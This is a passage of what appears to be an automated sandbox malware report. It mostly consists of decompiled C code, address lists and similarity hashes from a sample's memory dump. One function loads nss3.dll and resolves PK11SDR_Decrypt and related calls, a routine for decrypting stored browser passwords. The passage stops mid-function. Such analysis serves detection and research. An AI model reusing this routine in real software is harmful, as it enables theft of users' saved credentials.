                                                                                                                                                                        0x0040e236
                                                                                                                                                                        0x0040e23d
                                                                                                                                                                        0x0040e24d
                                                                                                                                                                        0x0040e254
                                                                                                                                                                        0x0040e262
                                                                                                                                                                        0x0040e266
                                                                                                                                                                        0x0040e272
                                                                                                                                                                        0x0040e274
                                                                                                                                                                        0x0040e28b
                                                                                                                                                                        0x0040e292
                                                                                                                                                                        0x0040e2a4
                                                                                                                                                                        0x0040e2ab
                                                                                                                                                                        0x0040e2c2
                                                                                                                                                                        0x0040e2c9
                                                                                                                                                                        0x0040e2db
                                                                                                                                                                        0x0040e2e2
                                                                                                                                                                        0x0040e2e7
                                                                                                                                                                        0x0040e2ea
                                                                                                                                                                        0x0040e2fc
                                                                                                                                                                        0x0040e30a
                                                                                                                                                                        0x0040e30f
                                                                                                                                                                        0x0040e311
                                                                                                                                                                        0x0040e313
                                                                                                                                                                        0x0040e326
                                                                                                                                                                        0x0040e32c
                                                                                                                                                                        0x0040e32c
                                                                                                                                                                        0x0040e345
                                                                                                                                                                        0x0040e347
                                                                                                                                                                        0x0040e349
                                                                                                                                                                        0x0040e35b
                                                                                                                                                                        0x0040e361
                                                                                                                                                                        0x0040e361
                                                                                                                                                                        0x0040e362
                                                                                                                                                                        0x0040e367
                                                                                                                                                                        0x0040e369
                                                                                                                                                                        0x0040e372
                                                                                                                                                                        0x0040e36b
                                                                                                                                                                        0x0040e36b
                                                                                                                                                                        0x0040e36b
                                                                                                                                                                        0x0040e377
                                                                                                                                                                        0x0040e37d
                                                                                                                                                                        0x0040e387
                                                                                                                                                                        0x0040e395
                                                                                                                                                                        0x0040e39c
                                                                                                                                                                        0x0040e3a1
                                                                                                                                                                        0x0040e3a7
                                                                                                                                                                        0x0040e3aa
                                                                                                                                                                        0x0040e3b2
                                                                                                                                                                        0x0040e3b8
                                                                                                                                                                        0x0040e3bd
                                                                                                                                                                        0x0040e3c5
                                                                                                                                                                        0x0040e3d9
                                                                                                                                                                        0x0040e3de
                                                                                                                                                                        0x0040e3e1
                                                                                                                                                                        0x0040e3e7
                                                                                                                                                                        0x0040e3fb
                                                                                                                                                                        0x0040e401
                                                                                                                                                                        0x0040e3e7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e37f
                                                                                                                                                                        0x0040e37f
                                                                                                                                                                        0x0040e385
                                                                                                                                                                        0x0040e402
                                                                                                                                                                        0x0040e466
                                                                                                                                                                        0x0040e47f
                                                                                                                                                                        0x0040e490
                                                                                                                                                                        0x0040e496
                                                                                                                                                                        0x0040e49e
                                                                                                                                                                        0x0040e49e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e385
                                                                                                                                                                        0x0040e37d
                                                                                                                                                                        0x0040e1b5
                                                                                                                                                                        0x0040e1bb
                                                                                                                                                                        0x0040e1c6
                                                                                                                                                                        0x0040e1e9
                                                                                                                                                                        0x0040e1f7
                                                                                                                                                                        0x0040e212
                                                                                                                                                                        0x0040e216
                                                                                                                                                                        0x0040e223
                                                                                                                                                                        0x0040e22c
                                                                                                                                                                        0x0040e22c
                                                                                                                                                                        0x0040e1e9
                                                                                                                                                                        0x0040e1c6
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040E460
                                                                                                                                                                        • {Unknown}, xrefs: 0040E259
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                                                                                                        • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                        • API String ID: 138940113-3474136107
                                                                                                                                                                        • Opcode ID: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                                                                                                                                                                        • Instruction ID: c9ff55592ed190661b3986ab950919d3506bad0d2814ede43270e5be3f0f5ae2
                                                                                                                                                                        • Opcode Fuzzy Hash: 69886baca77838fccc6ea5cb6e0f689363a9b5453ec14ca3e74d88e8d62f8c56
                                                                                                                                                                        • Instruction Fuzzy Hash: 4571D672404244BFD721DF61DC45EDB7FEDEB48344F00883EF648921A1DA399A65CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040E54C Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040E54C(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060DA(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062B7( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040E507();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                                                                                                                        0x0040e54c
                                                                                                                                                                        0x0040e566
                                                                                                                                                                        0x0040e56d
                                                                                                                                                                        0x0040e579
                                                                                                                                                                        0x0040e584
                                                                                                                                                                        0x0040e589
                                                                                                                                                                        0x0040e591
                                                                                                                                                                        0x0040e59c
                                                                                                                                                                        0x0040e5a9
                                                                                                                                                                        0x0040e5b9
                                                                                                                                                                        0x0040e5c0
                                                                                                                                                                        0x0040e5ca
                                                                                                                                                                        0x0040e5dd
                                                                                                                                                                        0x0040e5e6
                                                                                                                                                                        0x0040e603
                                                                                                                                                                        0x0040e5e8
                                                                                                                                                                        0x0040e5fa
                                                                                                                                                                        0x0040e600
                                                                                                                                                                        0x0040e611
                                                                                                                                                                        0x0040e619
                                                                                                                                                                        0x0040e61b
                                                                                                                                                                        0x0040e64d
                                                                                                                                                                        0x0040e663
                                                                                                                                                                        0x0040e66f
                                                                                                                                                                        0x0040e67b
                                                                                                                                                                        0x0040e687
                                                                                                                                                                        0x0040e693
                                                                                                                                                                        0x0040e69f
                                                                                                                                                                        0x0040e6a4
                                                                                                                                                                        0x0040e61d
                                                                                                                                                                        0x0040e62d
                                                                                                                                                                        0x0040e631
                                                                                                                                                                        0x0040e633
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e635
                                                                                                                                                                        0x0040e635
                                                                                                                                                                        0x0040e645
                                                                                                                                                                        0x0040e649
                                                                                                                                                                        0x0040e64b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040e64b
                                                                                                                                                                        0x0040e633
                                                                                                                                                                        0x0040e61b
                                                                                                                                                                        0x0040e6b1

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040E56D
                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040E59C
                                                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040E5A9
                                                                                                                                                                        • memset.MSVCRT ref: 0040E5C0
                                                                                                                                                                        • strlen.MSVCRT ref: 0040E5CA
                                                                                                                                                                        • strlen.MSVCRT ref: 0040E5D8
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040E611
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E62D
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040E645
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040E65A
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E666
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E672
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040E67E
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040E68A
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040E696
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040E6A2
                                                                                                                                                                          • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                          • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$strlen$CurrentDirectoryLibraryLoadmemset$HandleModulememcpy
                                                                                                                                                                        • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                        • API String ID: 1296682400-4029219660
                                                                                                                                                                        • Opcode ID: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                                                                                                                                                                        • Instruction ID: ea12e4d39b815288b34f85ef975f35705c11e21fdcabb8b0f4231a79c1823d94
                                                                                                                                                                        • Opcode Fuzzy Hash: b9878449b49199713cb1e65d9f830cec44e52960d34c19136fd466dd6c257c27
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E4197B1940318AACB20DF75CC49FC6BBE8AF64704F154C6BE185A2180E7B9A6D4CF58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00401060 Relevance: 39.2, APIs: 26, Instructions: 186COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                        			E00401060(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void _v267;
				char _v268;
				void* __edi;
				void* __esi;
				void* _t50;
				struct HBRUSH__* _t62;
				void* _t67;
				unsigned int _t68;
				void* _t73;
				struct HWND__* _t74;
				struct HWND__* _t75;
				void* _t78;
				unsigned int _t79;
				struct HWND__* _t81;
				struct HWND__* _t82;
				struct HWND__* _t83;
				struct HWND__* _t84;
				unsigned int _t89;
				struct HWND__* _t91;
				struct HWND__* _t93;
				struct HWND__* _t94;
				void* _t98;
				void* _t104;
				struct tagPOINT _t109;
				struct tagPOINT _t111;

				_t104 = __edx;
				_t100 = __ecx;
				_t50 = _a4 - 0x110;
				_t98 = __ecx;
				if(_t50 == 0) {
					__eflags =  *0x418348;
					if( *0x418348 != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x418348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t98 + 4), 0x3ee), 0);
					}
					_v268 = 0;
					memset( &_v267, 0, 0xff);
					SetWindowTextA( *(_t98 + 4), E004019DA(_t100,  &_v268, 0x413450));
					SetDlgItemTextA( *(_t98 + 4), 0x3ea, _t98 + 0xc);
					SetDlgItemTextA( *(_t98 + 4), 0x3ec, _t98 + 0x10b);
					E00401000(_t98, __eflags);
					E0040649B(_t104,  *(_t98 + 4));
					goto L29;
				} else {
					_t67 = _t50 - 1;
					if(_t67 == 0) {
						_t68 = _a8;
						__eflags = _t68 - 1;
						if(_t68 != 1) {
							goto L29;
						} else {
							__eflags = _t68 >> 0x10;
							if(_t68 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t98 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t73 = _t67 - 0x27;
						if(_t73 == 0) {
							_t74 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t74;
							if(_a12 != _t74) {
								__eflags =  *0x418388;
								if( *0x418388 == 0) {
									goto L29;
								} else {
									_t75 = GetDlgItem( *(_t98 + 4), 0x3ee);
									__eflags = _a12 - _t75;
									if(_a12 != _t75) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t62 = GetSysColorBrush(0xf);
							}
						} else {
							_t78 = _t73 - 0xc8;
							if(_t78 == 0) {
								_t79 = _a12;
								_t109 = _t79 & 0x0000ffff;
								_v12.x = _t109;
								_v12.y = _t79 >> 0x10;
								_t81 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t81;
								_t82 = ChildWindowFromPoint( *(_t98 + 4), _t109);
								__eflags = _t82 - _a8;
								if(_t82 != _a8) {
									__eflags =  *0x418388;
									if( *0x418388 == 0) {
										goto L29;
									} else {
										_t83 = GetDlgItem( *(_t98 + 4), 0x3ee);
										_push(_v12.y);
										_t84 = ChildWindowFromPoint( *(_t98 + 4), _v12.x);
										__eflags = _t84 - _t83;
										if(_t84 != _t83) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x417b94, 0x67));
									goto L8;
								}
							} else {
								if(_t78 != 0) {
									L29:
									_t62 = 0;
									__eflags = 0;
								} else {
									_t89 = _a12;
									_t111 = _t89 & 0x0000ffff;
									_v12.x = _t111;
									_v12.y = _t89 >> 0x10;
									_t91 = GetDlgItem( *(__ecx + 4), 0x3ec);
									_push(_v12.y);
									_a8 = _t91;
									if(ChildWindowFromPoint( *(_t98 + 4), _t111) != _a8) {
										__eflags =  *0x418388;
										if( *0x418388 == 0) {
											goto L29;
										} else {
											_t93 = GetDlgItem( *(_t98 + 4), 0x3ee);
											_push(_v12.y);
											_t94 = ChildWindowFromPoint( *(_t98 + 4), _v12);
											__eflags = _t94 - _t93;
											if(_t94 != _t93) {
												goto L29;
											} else {
												_push(0x418388);
												goto L7;
											}
										}
									} else {
										_push(_t98 + 0x10b);
										L7:
										_push( *(_t98 + 4));
										E00406552();
										L8:
										_t62 = 1;
									}
								}
							}
						}
					}
				}
				return _t62;
			}





























                                                                                                                                                                        0x00401060
                                                                                                                                                                        0x00401060
                                                                                                                                                                        0x0040106c
                                                                                                                                                                        0x00401074
                                                                                                                                                                        0x00401076
                                                                                                                                                                        0x00401231
                                                                                                                                                                        0x00401238
                                                                                                                                                                        0x00401273
                                                                                                                                                                        0x0040123a
                                                                                                                                                                        0x00401253
                                                                                                                                                                        0x00401262
                                                                                                                                                                        0x00401262
                                                                                                                                                                        0x00401287
                                                                                                                                                                        0x0040128e
                                                                                                                                                                        0x004012aa
                                                                                                                                                                        0x004012c2
                                                                                                                                                                        0x004012d3
                                                                                                                                                                        0x004012d7
                                                                                                                                                                        0x004012df
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040107c
                                                                                                                                                                        0x0040107c
                                                                                                                                                                        0x0040107d
                                                                                                                                                                        0x004011fc
                                                                                                                                                                        0x004011ff
                                                                                                                                                                        0x00401203
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401209
                                                                                                                                                                        0x0040120c
                                                                                                                                                                        0x0040120f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401215
                                                                                                                                                                        0x0040121a
                                                                                                                                                                        0x00401226
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401226
                                                                                                                                                                        0x0040120f
                                                                                                                                                                        0x00401083
                                                                                                                                                                        0x00401083
                                                                                                                                                                        0x00401086
                                                                                                                                                                        0x004011ad
                                                                                                                                                                        0x004011af
                                                                                                                                                                        0x004011b2
                                                                                                                                                                        0x004011da
                                                                                                                                                                        0x004011e1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004011e7
                                                                                                                                                                        0x004011ef
                                                                                                                                                                        0x004011f1
                                                                                                                                                                        0x004011f4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004011fa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004011fa
                                                                                                                                                                        0x004011f4
                                                                                                                                                                        0x004011b4
                                                                                                                                                                        0x004011b4
                                                                                                                                                                        0x004011b9
                                                                                                                                                                        0x004011c7
                                                                                                                                                                        0x004011cf
                                                                                                                                                                        0x004011cf
                                                                                                                                                                        0x0040108c
                                                                                                                                                                        0x0040108c
                                                                                                                                                                        0x00401091
                                                                                                                                                                        0x00401121
                                                                                                                                                                        0x0040112a
                                                                                                                                                                        0x00401138
                                                                                                                                                                        0x0040113b
                                                                                                                                                                        0x0040113e
                                                                                                                                                                        0x00401140
                                                                                                                                                                        0x00401143
                                                                                                                                                                        0x00401150
                                                                                                                                                                        0x00401152
                                                                                                                                                                        0x00401155
                                                                                                                                                                        0x00401171
                                                                                                                                                                        0x00401178
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040117e
                                                                                                                                                                        0x00401186
                                                                                                                                                                        0x00401188
                                                                                                                                                                        0x00401193
                                                                                                                                                                        0x00401195
                                                                                                                                                                        0x00401197
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040119d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040119d
                                                                                                                                                                        0x00401197
                                                                                                                                                                        0x00401157
                                                                                                                                                                        0x00401157
                                                                                                                                                                        0x00401166
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401166
                                                                                                                                                                        0x00401097
                                                                                                                                                                        0x00401099
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x004012e5
                                                                                                                                                                        0x0040109f
                                                                                                                                                                        0x0040109f
                                                                                                                                                                        0x004010a8
                                                                                                                                                                        0x004010b6
                                                                                                                                                                        0x004010b9
                                                                                                                                                                        0x004010bc
                                                                                                                                                                        0x004010be
                                                                                                                                                                        0x004010c1
                                                                                                                                                                        0x004010d3
                                                                                                                                                                        0x004010ee
                                                                                                                                                                        0x004010f5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004010fb
                                                                                                                                                                        0x00401103
                                                                                                                                                                        0x00401105
                                                                                                                                                                        0x00401110
                                                                                                                                                                        0x00401112
                                                                                                                                                                        0x00401114
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x00401114
                                                                                                                                                                        0x004010d5
                                                                                                                                                                        0x004010db
                                                                                                                                                                        0x004010dc
                                                                                                                                                                        0x004010dc
                                                                                                                                                                        0x004010df
                                                                                                                                                                        0x004010e6
                                                                                                                                                                        0x004010e8
                                                                                                                                                                        0x004010e8
                                                                                                                                                                        0x004010d3
                                                                                                                                                                        0x00401099
                                                                                                                                                                        0x00401091
                                                                                                                                                                        0x00401086
                                                                                                                                                                        0x0040107d
                                                                                                                                                                        0x004012eb

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2998058495-0
                                                                                                                                                                        • Opcode ID: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                        • Instruction ID: d9fb6b658f62cfbd3d3feccfc88cd7b26f9bda258aecb32a4b2b6428ade5212d
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ebdac4dc682d180df791e79ca3a4ee1758aaaedabd5f88fc31ce58f9e0aca68
                                                                                                                                                                        • Instruction Fuzzy Hash: 21619D31400248FBDF129F60DD89BAA7FA5EB04715F14C1B6F908BA2F1C7759A90DB58
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A88E Relevance: 38.8, APIs: 18, Strings: 4, Instructions: 285windowregistrystringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                        			E0040A88E(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				char* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407D23(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x41344f,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x417b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E00402393( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x417b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E0040A02E(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x417b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409F9C(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407D23(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x41344f;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L00412072();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, 0x41344f);
					}
					E0040B031(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x418660 == 0) {
						E0040617C(0x418660);
						if((GetFileAttributesA(0x418660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x418660);
						}
					}
					_t204 = strlen(0x418660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062B7(_t194 + 0x264, 0x418660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A175( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A3E9(0, 1, _t205, _t223);
					E00401E4A(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
